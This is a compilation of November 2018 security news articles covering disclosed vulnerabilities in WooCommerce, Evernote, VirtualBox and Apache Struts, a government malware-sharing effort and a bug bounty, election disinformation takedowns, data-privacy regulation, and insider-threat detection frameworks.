The U.S. Cyber Command (USCYBERCOM) CNMF is sharing malware samples with the cybersecurity industry via VirusTotal intelligence service.
The U.S. Cyber Command (USCYBERCOM) is providing unclassified malware samples to VirusTotal intelligence service with the intent of sharing them with cybersecurity industry.

The USCYBERCOM’s Cyber National Mission Force (CNMF) is going to share the unclassified malware samples on the CYBERCOM_Malware_Alert VirusTotal account.

Researchers interested in the sample can follow the USCYBERCOM malware reporting handle on Twitter.

“Today, the Cyber National Mission Force, a unit subordinate to U.S. Cyber Command, posted its first malware sample to the website VirusTotal. Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity.” USCYBERCOM stated.

“Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity.”

CNMF was launched to improve information sharing on the cyber threats and allow early detection of the activities of malicious cyber actors.

USCYBERCOM Malware Alert
This Twitter account was created solely to provide alerts to the cybersecurity community that #CNMF has posted new malware to @virustotal. A log of our uploads can be found here: https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/ …

7:32 PM - Nov 5, 2018
145 people are talking about this
Twitter Ads info and privacy
The first samples shared by CNMF on VirusTotal belong to the Lojack (LoJax) family, in May several LoJack agents were found to be connecting to servers that are believed to be controlled by the notorious Russia-linked Fancy Bear APT group.

The samples recently shared appears to be associated with the UEFI rootkit discovered in September by the malware researchers from ESET.

Personally, I believe that this initiative of really important to rapidly profile threat actors and mitigate the spreading of malicious codes.

A flaw in WooCommerce WordPress Plugin could be exploited to take over e-stores
8.11.2018 securityaffairs
Exploit Vulnerebility

A critical Remote Code Execution vulnerability affects eCommerce website running on WordPress and using the WooCommerce plugin.
A critical vulnerability affects eCommerce website running on WordPress and using the WooCommerce plugin. WooCommerce is one of the major eCommerce plugins for WordPress that allows operators to easily build e-stores based on the popular CMS, it accounts for more than 4 million installations with 35% market share.

The vulnerability is an arbitrary file deletion vulnerability that could be exploited by a malicious or compromised privileged user to take over the online store.

The flaw was discovered by Simon Scannell, a researcher at RIPS Technologies GmbH,

“A flaw in the way WordPress handles privileges can lead to a privilege escalation in WordPress plugins. This affects for example WooCommerce, the most popular e-commerce plugin with over 4 million installations.” reads the security advisory published by RIPSTECH.

“The vulnerability allows shop managers to delete certain files on the server and then to take over any administrator account.”

The vulnerability was already fixed with the release of the plugin version 3.4.6.

Scannell pointed out that arbitrary file deletion flaws aren’t usually considered critical issues because attackers use them to cause is a Denial of Service condition by deleting the index.php of the website. Anyway, the expert highlighted that deleting certain plugin files in WordPress an attacker could disable security checks and take over the e-commerce website.

The expert published a video PoC that shows how to exploit the flaw allowing an account with “Shop Manager” role to reset administrator accounts’ password and take over the store.

The installation process of the plugin creates “Shop Managers” accounts with “edit_users” permissions, this means that these accounts can edit store customer accounts to manage their orders, profiles, and products.

The expert pointed out that an account with “edit_users” in WordPress could also edit an administrator account, for this reason, the WooCommerce plugin implements some extra limitations to prevent abuses.

Scannell discovered that an administrator of a WordPress website disables the WooCommerce component, the limitations that the plugin implements are no more valid allowing Shop Manager accounts to edit and reset the password for administrator accounts.

The expert explained that an attacker that controls a Shop Manager account can disable the WooCommerce plugin by exploiting a file deletion vulnerability that resides in the logging feature of WooCommerce.

“By default, only administrators can disable plugins. However, RIPS detected an arbitrary file deletion vulnerability in WooCommerce. This vulnerability allows shop managers to delete any file on the server that is writable. By deleting the main file of WooCommerce, woocommerce.php, WordPress will be unable to load the plugin and then disables it.” continues the post.

“The file deletion vulnerability occurred in the logging feature of WooCommerce.”

Once the flaws are exploited the WooCommerce plugin gets disabled, the shop manager can take over any administrator account and then execute code on the server.

Below the timeline for the flaw:

2018/08/30 The Arbitrary File Deletion Vulnerabiliy was reported to the Automattic security team on Hackerone.
2018/09/11 The vulnerability was triaged and verified by the security team.
2018/10/11 A patch was released.
The Automattic security team addressed the flaws with the release of the plugin version 3.4.6.

U.S. Air Force announced Hack the Air Force 3.0, the third Bug Bounty Program
8.11.2018 securityaffairs

The United States Air Force announced earlier this week that it has launched the third bug bounty program called Hack the Air Force 3.0.
The United States Air Force launched earlier this week its third bug bounty program, called Hack the Air Force 3.0, in collaboration with HackerOne.

“Thank you for your interest in participating in HackerOne’s U.S. Department of Defense (DoD) “Hack the Air Force 3.0” Bug Bounty challenge.” reads the announcement published by the United States Air Force.

“This is an effort for the U.S. Department of the Air Force to explore new approaches to its security, and to adopt the best practices used by the most successful and secure software companies in the world. By doing so, the U.S. Air Force can ensure its systems and warfighters are as secure as possible.”

The program started on October 19 and will last more than for weeks, its finish is planned for November 22.

Hack the Air Force 3.0 is the largest bug bounty program run by the U.S. government to date, it involves up to 600 researchers.

“Hack the AF 3.0 demonstrates the Air Forces willingness to fix vulnerabilities that present critical risks to the network,” said Wanda Jones-Heath, Air Force chief information security officer.

Participants will have to find vulnerabilities in the Department of Defense applications, 70% of the participants will be selected by the HackerOne reputation system and the remaining will be selected randomly.

The bug bounty is open for U.S. persons as defined by the Internal Revenue Code Section 7701(a)(30), including U.S. Government contractor personnel. The challenge is also open to foreign nationals based on their Government passport, who are not on the U.S. Department of Treasury’s Specially Designated Nationals List, and who are not citizens of China, Russia, Iran, and the Democratic People’s Republic of Korea.

“If you submit a qualifying, validated vulnerability, you may be eligible to receive an award, pending a security and criminal background check. Specific information on payment eligibility will be provided upon acceptance into the challenge.” continues the announcement.

The minimum payout for this challenge is $5,000 for critical vulnerabilities.

The first Hack the Air Force bug bounty program was launched by the United States Air Force in April 2017 to test the security of its the networks and computer systems.

The program allowed to discover over 200 valid vulnerabilities, researchers received more than $130,000. On February 2018, HackerOne announced the results of the second round for U.S. Air Force bug bounty program, Hack the Air Force 2.0.. The US Government paid more than $100,000 for over 100 reported vulnerabilities.

XSS flaw in Evernote allows attackers to execute commands and steal files
8.11.2018 securityaffairs

Security expert discovered a stored XSS flaw in the Evernote app for Windows that could be exploited to steal files and execute arbitrary commands.
A security expert that goes online with the moniker @sebao has discovered a stored cross-site scripting (XSS) vulnerability in the Evernote application for Windows that could be exploited by an attacker to steal files and execute arbitrary commands.

The expert noticed that when a user adds a picture to a note and then renames it, it could use a JavaScript code instead of a name. Sebao discovered that if the note was shared with another Evernote user, the code would get executed when the recipient clicked on the picture.

In September, Evernote addressed the stored XSS flaw with the release of the version 6.16., but the fix was incomplete.

The expert TongQing Zhu from Knownsec 404 Team discovered that it was still possible to execute arbitrary with a variant of the above trick.

TongQing Zhu discovered that the code used instead of the name could load a Node.js file from a remote server, the script is executed via NodeWebKit that is used by Evernote in presentation mode.

“I find Evernote has a NodeWebKit in C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit and Present mode will use it. Another good news is we can execute Nodejs code by stored XSS under Present mode.” explained TongQing Zhu.

The attacker only needs to trick an Evernote into opening a note in presentation mode, in this way he will be able to steal arbitrary files and execute commands.

TongQing Zhu showed how a hacker could exploit the vulnerability to read a Windows file and execute the Calculator application on the targeted system.

The flaw was tracked as CVE-2018-18524 and was initially addressed with the release of Evernote for Windows 6.16.1 beta in October. The final patch was released earlier this month with the release of Evernote 6.16.4.

TongQing Zhu has published two PoC videos for the exploitation of the flaw:


World Wide Web Inventor Wants New 'Contract' to Make Web Safe
8.11.2018 securityweek

The inventor of the World Wide Web on Monday called for a "contract" to make internet safe and accessible for everyone as Europe’s largest tech event began in Lisbon amid a backlash over its role in spreading "fake news".

Some 70,000 people are expected to take part in the four-day Web Summit, dubbed "the Davos for geeks", including speakers from leading global tech companies, politicians and start-ups hoping to attract attention from the over 1,500 investors who are scheduled to attend.

Tech firms now find themselves on the defensive, with critics accusing them of not doing enough to curb the spread of "fake news" which has helped polarise election campaigns around the world and of maximising profits by harvesting data on consumers’ browsing habits.

British computer scientist Tim Berners-Lee, who in 1989 invented the World Wide Web as a way to exchange information, said the internet had deviated from the goals its founders had envisaged.

"All kinds of things have things have gone wrong. We have fake news, we have problems with privacy, we have people being profiled and manipulated," he said in an opening address.

Berners-Lee, 63, called on governments, companies and citizens to iron out a "complete contract" for the web that will make the internet "safe and accessible" for all by May 2019, the date by which 50 percent of the world will be online for the first time.

'Going through a funk'

He has just launched Inrupt, a start-up which is building an open source platform called "Solid" which will decentralise the web and allow users to choose where their data is kept, along with who can see and access it.

Solid intends to allow users to bypass tech giants such as Google and Facebook. The two tech giants now have direct influence over nearly three quarters of all internet traffic thanks to the vast amounts of apps and services they own such as YouTube, WhatsApp and Instagram.

Employees of Google, Facebook and other tech giants have in recent months gone public with their regrets, calling the products they helped build harmful to society and overly addictive.

Tech giants are also under fire for having built up virtual monopolies in their areas.

Amazon accounts for 93 percent of all e-book sales while Google swallows up 92 percent of all European internet-search ad spending.

"I think technology is going through a funk... it's a period of reflection," Web Summit founder and CEO Paddy Cosgrave told AFP.

"With every new technology you go through these cycles. The initial excitement of the printed press was replaced in time by a great fear that it was actually a bad thing. Over time it has actually worked out OK."

Violent voices magnified

Among those scheduled to speak at the event is Christopher Wylie, a whistleblower who earlier this year said users’ data from Facebook was used by British political consultancy Cambridge Analytica to help elect US President Donald Trump -- a claim denied by the company.

Another tech veteran who has become critical of the sector, Twitter co-founder Ev Williams, will on Thursday deliver the closing address.

He left Twitter in 2011 and went on to co-found online publishing platform Medium, which is subscription based and unlike Twitter favours in-depth writing about issues.

The problem with the current internet model is that negative content gets more attention online, and thus gain more advertisers, according to Mitchell Baker, the president of the Mozilla Foundation, a non-profit organisation which promotes Internet innovation.

"Today everyone has a voice but the problem is... the loudest and often most violent voices get magnified because the most negative, scariest things attract our attention," she told AFP in a recent interview.

The Web Summit was launched in Dublin in 2010 and moved to Lisbon six years later. The Portuguese government estimates the event will generate 300 million euros ($347 million) for Lisbon in hotel and other revenues.

VMware Unveils New Blockchain Service
8.11.2018 securityweek

One of the new technologies announced on Tuesday by VMware at its VMworld 2018 Europe conference is VMware Blockchain, which aims to provide enterprises a decentralized trust infrastructure based on permissioned blockchain.

The blockchain is a distributed database consisting of blocks that are linked and protected against unauthorized modifications using cryptography. Transactions are only written to a block after they are verified by a majority of nodes.

While blockchain is mainly known for its role as the public transaction ledger for cryptocurrencies, companies have been increasingly using blockchain for other purposes, including for identity verification and securing data and devices.

VMware launches VMware Blockchain

There are three types of blockchain networks: public, private and permissioned. Public blockchain is mainly used for cryptocurrencies such as bitcoin, where anyone can join and any participant can make changes. In the case of a private blockchain, only verified participants can contribute. Permissioned blockchain is a mix between public and private and it provides numerous customization options.

Permissioned blockchain is fast and it’s increasingly used for enterprise applications, which is why the virtualization giant wants to help its customers by providing a hybrid, scalable and managed blockchain service.

“VMware Blockchain will provide the foundation for decentralized trust while delivering enterprise-grade scalability, reliability, security and manageability. The service will be integrated into existing VMware tools to help protect the network and compute functions that underlie a true enterprise blockchain,” said Mike DiPetrillo, blockchain senior director at VMware.

VMware Blockchain is being developed in collaboration with Dell Technologies, Deloitte and WWT, and it will be supported by both VMware products and IBM Cloud.

According to VMware, the new platform allows enterprises to deploy nodes across different cloud environments, it provides a central management interface, along with monitoring and auditing capabilities, and offers developers the tools and guidance they need.

VMware Blockchain is currently in beta. Organizations interested in testing it have been instructed to contact VMware.

Hackers Target Telegram, Instagram Users in Iran
8.11.2018 securityweek Hacking

Hackers have been targeting Iranian users of Telegram and Instagram with fake login pages, app clones and BGP hijacking in attacks that have been ongoing since 2017, Cisco Talos reveals.

Banned in Iran, Telegram is a popular target for greyware, software that provides the expected functionality but also suspicious enough to be considered a potentially unwanted program (PUP). Attacks on Iranian users differ in complexity, based on resources and methods, and those analyzed by Cisco were aimed at stealing personal and login information.

As part of these attacks, users were tricked into installing Telegram clones that can access a mobile device’s full contact lists and messages. The fake Instagram apps, on the other hand, were designed to send full session data to the attackers, who would then gain full control of the account in use.

“We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country,” Cisco says.

The greyware targeting Iran users includes software from andromedaa.ir, a developer targeting both iOS and Android with apps that are not in the official stores and which claim to boost users’ exposure on Instagram or Telegram by increasing the likes, comments, followers.

The email address used to register the andromedaa.ir domain was also used for domains distributing cloned Instagram and Telegram applications, the researchers discovered. Without even requiring the user’s Instagram password, the operator gains access to take over the user session, while the Telegram app provides access to contact list and messages.

In addition to greyware software, the attackers were also observed using fake login pages to target users in Iran, a technique that Iran-connected groups like “Charming Kitten” have been long using. Other actors would hijack the device’s BGP protocol and redirect the traffic, a type of attack that needs cooperation from an Internet service provider (ISP).

Although all of the observed attacks would target Iran, Cisco’s security researchers did not find a connection between them. The threat, however, looms over users worldwide, especially those in countries like Iran and Russia, where Telegram and similar apps are banned, and these are only some of techniques state-sponsored actors use to deploy surveillance mechanisms, Cisco notes.

In Iran, the researchers found several Telegram clones with thousands of installations that contact IP addresses located in Iran, and some of them claim to be able to circumvent the ban the Iran government has put on the encrypted communication service.

“The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users’ devices,” the security researchers point out.

Researcher Drops Oracle VirtualBox Zero-Day
8.11.2018 securityweek

A researcher has disclosed the details of a zero-day vulnerability affecting Oracle’s VirtualBox virtualization software. The flaw appears serious as exploitation can allow a guest-to-host escape.

Russian researcher Sergey Zelenyuk discovered the security hole and he decided to make his findings public before giving Oracle the chance to release a patch due to his “disagreement with [the] contemporary state of infosec, especially of security research and bug bounty.”

According to Zelenyuk, the vulnerability affects VirtualBox 5.2.20 and prior versions – 5.2.20 is the latest version, released on October 16 – and it can be exploited on any host or guest operating system as the underlying bugs affect shared code. The expert has tested his exploit, which he claims is “100% reliable,” on Ubuntu 16.04 and 18.04 x86-64 guests, but he believes the attack also works against Windows.

An attack can only be carried out against virtual machines using an Intel PRO/1000 MT Desktop (82540EM) network card (E1000), with network address translation (NAT) enabled, which is the default configuration.

The security hole, caused by memory corruption bugs, allows an attacker with root or administrator privileges to the guest system to escape to the host userland (ring 3). From there, they may be able to obtain kernel privileges (ring 0) on the host by exploiting other vulnerabilities. Exploitation starts by loading a Linux kernel module (LKM) in the guest operating system.

“Elevated privileges are required to load a driver in both OSs. It's common and isn't considered an insurmountable obstacle. Look at Pwn2Own contest where researchers use exploit chains: a browser opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0, where there is anything you need to attack a hypervisor from the guest OS,” the researcher explained in a post on GitHub.

“The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it's mostly not audited yet,” he added.

While some agree with Zelenyuk regarding the current state of bug bounty programs, others questioned his decision.

Contacted by SecurityWeek, Oracle declined to comment and instead pointed to its vulnerability disclosure policies.

Until a patch is made available, users can protect themselves against potential attacks by changing the network card on their virtual machines to AMD PCnet or a paravirtualized network adapter. Another mitigation involves avoiding the use of NAT, Zelenyuk said.

Google Removes Vulnerable Library from Android
8.11.2018 securityweek

Google this week released the November 2018 set of security patches for its Android platform, which address tens of Critical and High severity vulnerabilities in the operating system.

The addressed issues include remote code execution bugs, elevation of privilege flaws, and information disclosure vulnerabilities, along with a denial of service. Impacted components include Framework, Media framework, System, and Qualcomm components.

“The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google explains.

The Internet giant also announced that the Libxaac library has been marked as experimental and is no longer used in production of Android builds. The reason for this is the discovery of multiple vulnerabilities in the library, and Google lists 18 CVEs impacting it.

As usual, the search company split the fixes into two parts, with the 2018-11-01 security patch level, addressing 17 flaws, including four rated Critical severity (all of which impact Media framework).

This security patch level fixes 7 elevation of privilege bugs (two rated Critical, four High severity, and one Medium), three remote code execution bugs (two Critical and one High severity), six information disclosure issues (all rated High severity) and one denial of service (Medium).

The 2018-11-05 security patch level, on the other hand, patches 19 issues, three of which were rated Critical.

Two of the bugs impact the Framework component, while the remaining 17 were addressed in Qualcomm components, including 14 issues in Qualcomm closed-source components (3 Critical and 11 High risk).

According to Google, it has no reports of active customer exploitation or abuse of these issues. The company also notes that exploitation of vulnerabilities is more difficult on newer versions of Android and encourages users to update as soon as possible.

In addition to these patches, Pixel and Nexus devices receive fixes for three additional vulnerabilities. These include an elevation of privilege in HTC components and two other bugs in Qualcomm components. All three are rated Medium severity.

“All Pixel devices running Android 9 will receive an Android 9 update as part of the November OTA. This quarterly release contains many functional updates and improvements to various parts of the Android platform and supported Pixel devices,” Google says.

A series of functional updates were also pushed to these devices, to improve performance for the use of picture-in-picture, Strongbox symmetric key generation requests, and stability for notifications.

UK Regulator Calls for Tougher Rules on Personal Data Use
7.11.2018 securityweek 

Britain's data commissioner on Tuesday called for tougher rules governing the use of personal data by political campaigns around the world, declaring that recent investigations have shown a disturbing disregard for voters and their privacy.

Speaking to the U.K. Parliament's media committee, Elizabeth Denham updated lawmakers on her office's investigation into the use of data analysis by political campaigns - a probe that has already seen Facebook slapped with a maximum fine for data misuse. Denham warned that democracy is under threat because behavioral targeting techniques developed to sell products are now being used to promote political campaigns and candidates.

"I don't think that we want to use the same model that is used to sell us holidays and shoes and cars to engage with people and voters," she said. "I think people expect more than that."

New rules are needed to govern advertising and the use of data, Denham said. She called on all players — the government and regulators but also the big internet firms like Facebook and smaller brokers of online data — to reassess their responsibilities in the era of big data.

"We really need to tighten up controls across the entire ecosystem because it matters to our democratic processes," she said.

The U.K. data regulator is conducting a broad inquiry into how political parties, data companies and social media platforms use personal information to target voters during political campaigns, including Britain's 2016 Brexit referendum on EU membership. The investigation followed allegations that British consultancy Cambridge Analytica improperly used information from more than 87 million Facebook accounts to manipulate elections.

Denham said legal systems had failed to keep up with the rapid development of the internet, and that tech companies need to be subject to greater oversight.

"I think the time for self-regulation is over," she said. "That ship has sailed."

Committee chair Damian Collins said he heard her opinion "loudly" and repeated his demand that Facebook CEO Mark Zuckerberg testify before his committee.

As she updated lawmakers on the probe, Denham announced fines for the campaign backing Britain's departure from the European Union and an insurance company founded by its millionaire backer totaling 135,000 pounds ($176,000) for breaches of data laws.

Denham said the Brexit campaign group Leave.EU and Eldon Insurance company — founded by businessman Arron Banks —were fined 60,000 pounds each for "serious breaches" of electronic marketing laws.

Leave.EU was also fined 15,000 pounds for a separate breach in which almost 300,000 emails were sent to Eldon customers with a newsletter for the Brexit campaign group.

The data watchdog is also "investigating allegations that Eldon Insurance Services Limited shared customer data obtained for insurance purposes with Leave.EU."

Facebook Blocks 115 Accounts on Eve of US Election
7.11.2018 securityweek 

Facebook said Monday it blocked some 30 accounts on its platform and 85 more on Instagram after police warned they may be linked to "foreign entities" trying to interfere in the US midterm election.

The announcement came shortly after US law enforcement and intelligence agencies said that Americans should be wary of Russian attempts to spread fake news. The election is Tuesday.

A study published last week found that misinformation on social media was spreading at a greater rate than during the run-up to the 2016 presidential vote, which Russia is accused of manipulating through a vast propaganda campaign in favor of Donald Trump, the eventual winner.

"On Sunday evening, US law enforcement contacted us about online activity that they recently discovered and which they believe may be linked to foreign entities," Facebook head of cybersecurity policy Nathaniel Gleicher said in a blog post.

"We immediately blocked these accounts and are now investigating them in more detail."

The investigation so far identified around 30 Facebook accounts and 85 Instagram accounts that appeared to be engaged in "coordinated inauthentic behavior," Gleicher said.

He added that all the Facebook pages associated with the accounts appeared to be in French or Russian.

The Instagram accounts were mostly in English, with some "focused on celebrities, others political debate."

"Typically, we would be further along with our analysis before announcing anything publicly," Gleicher said.

"But given that we are only one day away from important elections in the US, we wanted to let people know about the action we've taken and the facts as we know them today."

'Junk News'

Despite an aggressive crackdown by social media firms, so-called "junk news" is spreading at a greater rate than in 2016 on social media ahead of Tuesday's US congressional election, Oxford Internet Institute researchers said in a study published Thursday.

Twitter said Saturday it deleted a "series of accounts" that attempted to share disinformation. It gave no number.

Facebook last month said it took down accounts linked to an Iranian effort to influence US and British politics with messages about charged topics such as immigration and race relations.

The social network identified 82 pages, groups and accounts that originated in Iran and violated policy on coordinated "inauthentic" behavior.

Gleicher said at the time there was overlap with accounts taken down earlier this year and linked to Iranian state media, but the identity of the culprits has yet to be determined.

Posts on the accounts or pages, which included some hosted by Facebook-owned Instagram, focused mostly on "sowing discord" via strongly divisive issues rather than on particular candidates or campaigns.

Sample posts shared included inflammatory commentary about US President Donald Trump, British Prime Minister Theresa May and the controversy around freshly appointed US Supreme Court Justice Brett Kavanaugh.

War room

Major online social platforms have been under intense pressure to avoid being used by "bad actors" out to sway outcomes by publishing misinformation and enraging voters.

Facebook weeks ago opened a "war room" at its Menlo Park headquarters in California to be a nerve center for the fight against misinformation and manipulation of the largest social network by foreign actors trying to influence elections in the United States and elsewhere.

The shutdown of thousands of Russian-controlled accounts by Twitter and Facebook -- plus the indictments of 14 people from Russia's notorious troll farm the Internet Research Agency -- have blunted but by no means halted their efforts to influence US politics.

Facebook, which has been blamed for doing too little to prevent misinformation efforts by Russia and others in the 2016 US election, now wants the world to know it is taking aggressive steps with initiatives like the war room.

The war room is part of stepped up security announced by Facebook, which will be adding some 20,000 employees.

Apache Struts Users Told to Update Vulnerable Component
7.11.2018 securityweek 

Apache Struts developers are urging users to update a file upload library due to the existence of two vulnerabilities that can be exploited for remote code execution and denial-of-service (DoS) attacks.

The team behind the open source development framework pointed out that the Commons FileUpload library, which is the default file upload mechanism in Struts 2, is affected by a critical remote code execution vulnerability.

The flaw, tracked as CVE-2016-1000031, was discovered by Tenable researchers back in 2016. It was patched with the release of Commons FileUpload version 1.3.3 in June 2017.

“There exists a Java Object in the Apache Commons FileUpload library that can be manipulated in such a way that when it is deserialized, it can write or copy files to disk in arbitrary locations. Furthermore, while the Object can be used alone, this new vector can be integrated with ysoserial to upload and execute binaries in a single deserialization call,” Tenable said when it disclosed the security bug.

Struts versions after 2.5.12 are already using version 1.3.3 of the library, but applications using Struts 2.3.36 and earlier need to update the library manually by replacing the commons-fileupload JAR file in WEB-INF/lib with the patched version.

Version 1.3.3 of the Commons FileUpload library also includes a fix for a less severe DoS vulnerability discovered in 2014 and tracked as CVE-2014-0050.

Malicious actors could exploit this flaw to launch DoS attacks on publicly accessible sites, Apache Struts developers warned. This vulnerability was first patched in February 2014 with the release of version 1.3.1.

Johannes Ullrich, dean of research at the SANS Technology Institute, also advised users to check for other copies of the library on their system since Struts is not the only one using it.

It’s not uncommon for malicious hackers to exploit Apache Struts vulnerabilities in their attacks, even one year after they have been patched.

One recent example involves CVE-2018-11776, an easy-to-exploit bug that cybercriminals have exploited to deliver cryptocurrency miners.

U.S. Government Publishes New Insider Threat Program Maturity Framework
7.11.2018 securityweek 

National Insider Threat Task Force (NITTF) Releases New Insider Threat Program Maturity Framework

Some 18 months after WikiLeaks began to publish the Iraq War Logs exfiltrated by Chelsea Manning (at that time, Bradley Manning), President Obama issued a Presidential Memorandum: National Insider Threat Policy and Minimum Standards for Executive Branch Insider Threat Programs Memorandum for the Heads of Executive Departments and Agencies.

"The resulting insider threat capabilities," it said, "will strengthen the protection of classified information across the executive branch and reinforce our defenses against both adversaries and insiders who misuse their access and endanger our national security."

It clearly didn't work. A year later, the Edward Snowden leaks began to appear -- and leaks have continued ever since. In 2016, the hacking group known as Shadow Brokers began to leak NSA tools (including the EternalBlue details that were used by WannaCry and NotPetya); but there have been suggestions that the documents were initially leaked to the Shadow Brokers by NSA contractor Hal Martin.

In 2017, the Vault 7 (CIA files) began to appear. In June 2018, Joshua Adam Schulte -- a former employee of first the NSA and then the CIA -- was charged with the theft of the classified CIA documents published by WikiLeaks.

On November 1, 2018, the National Insider Threat Task Force (NITTF), operating under the joint leadership of the Attorney General and the Director of National Intelligence, published a new Insider Threat Program Maturity Framework (PDF). The purpose, announced a statement from the Office of the Director of National Intelligence, is "to help executive branch departments and agenciesí insider threat programs advance beyond the Minimum Standards to become more proactive, comprehensive, and better postured to deter, detect, and mitigate insider threat risk."

The new Framework takes key elements from the Obama 'minimum standards' memorandum and enhances and expands them so that departments and agencies (D/As) using them can "garner greater benefits from insider threat program resources, procedures, and processes." It comprises 19 elements that each identifies an attribute of an advanced Insider Threat Program (InTP). Each element, according to the introduction to the Framework, "provides amplifying information to assist programs in strengthening the effectiveness of the associated minimum standard."

This Framework is specifically designed for government departments and agencies, and its primary purpose is to defend national security rather than capitalist IP. D/As are very different in make up, mission and culture to private industry -- but private industry has its own potentially larger insider threat to manage. There will be a temptation for private industry to seek to adopt the same framework.

For example, David Wilcox, VP of federal for Dtex Systems, has commented, "The Dtex annual insider threat intelligence report revealed that insider threats are active in all industries, including government. This Framework comes at a pivotal time, when insider threats are on the rise and the damages they cause are increasing. This framework points out key elements for addressing insider threats, which could be used by any industry to reduce related risks."

Some of the Framework's elements could certainly be transposed to and used by private industry. Others will need to be approached with caution. For example, the very first element describes "the joint responsibility and commitment of D/A and InTP leadership to develop InTP infrastructure and personnel and promote the importance of addressing the insider threat at a level sufficient to create an effective and enduring Program."

The third element says, "It is crucial for InTPs in countering the insider threat to maintain compliance with changes in the policy, legal, regulatory, workforce, and technology environments of their D/A. The InTP can remain current through participation in D/A forums involved in policy-making, regulatory developments, and technology infrastructure advances to assess the impact of any changes on Program compliance and effectiveness."

This is already beginning to look like a new department with a high-level and highly specialist leadership that will undoubtedly be expensive. With companies already questioning the need to have new Data Processing Officer -- as required by GDPR -- the need for more expense that is not required by law will undoubtedly be questioned. Any organization seeking to use the Framework as a guide for its own insider threat program will first need to distil the guidelines into something affordable.

There are more banana skins for private industry in the Framework. Element 7 describes an insider threat awareness training requirement -- which is good practice. But where do you go from there? "InTPs can drive cultural change within their D/As and build a culture of insider threat awareness and responsibility for reporting potential insider threats through communications campaigns."

The danger here is that it could lead to at least subtle encouragement for staff to report each other as potential insider threats. That could easily go horribly wrong and lead to a deteriorating workplace culture.

This is not to say that the Framework is devoid of good practices that could transpose to private industry. Elements 14 and 15 offer advice on insider threat detection. The former suggests the use of advanced analytics and anomaly detection. Such tools, suggest Element 14, "can help manage large data volume as a first step in establishing a baseline from which to identify anomalous behavior. Data analytic tools can help insider threat analysts to contextualize the behavior in supporting decisions to conduct inquiries, refer matters to response elements, and/or develop mitigation strategies."

Element 15 is more creepy, but could be managed if implemented carefully. "Each employee responds to events and conditions in their work and personal lives differently -- that response, positive or negative, is a key concern for an InTP. A program with access to personnel with behavioral sciences expertise, either through internal D/A or affiliated resources, can strengthen its capabilities to identify and assess types of concerning behavior, contextualize the behavior, discern unconscious biases and propose alternative hypotheses."

This is the use of the expanding field of behavioral science. It would require monitoring staff emails and chats, but has the advantage of being, or at least appearing to be, impersonal. In 2017 a paper published by the Intelligence and National Security Alliance (INSA) suggests psycholinguistic analysis could detect the development of an insider threat before the threat becomes a reality.

The paper discusses what it calls counterproductive work behaviors (CWBs). It asserts that malicious insiders do not start work as malicious insiders, but that life and work pressures and stresses create them. Escalating CWBs can be detected through psycholinguistic analysis of emails, personal blogs, chats and tweets -- the theory being that an unhappy employee can be detected and helped before he or she becomes a malicious insider employee.

Despite concerns that private industry should perhaps not attempt to transpose the Framework verbatim into the workplace, there is nevertheless much that is good that could form the basis of good practice in insider threat protection. While it has been designed for government departments and agencies, it could still be useful to private organizations if they cherry-pick.

Psycho-Analytics Could Aid Insider Threat Detection
7.11.2018 securityweek 

Psycho-Analytics Could Help Detect Future Malicious Behavior

The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed through Congress unamended in January 2017.

The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.

One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider through using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.

Psycho-analytics Used for Insider Threat Detection

Traditional security controls, such as access control and DLP, have some but little effect. In recent years, these have been supplemented by user behavior analytics (UBA), using machine learning to detect anomalous user behavior within the network.

"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."

Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."

Learn to Detect Insider ThreatsThis week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that physical user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just the baseline of acceptable behavior on the network, but incorporate the psychological effect of life events both inside and outside of the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and be able to predict malicious behavior before it happens.

The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology; machine learning (ML) and artificial intelligence (AI).

This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.

Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.

Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.

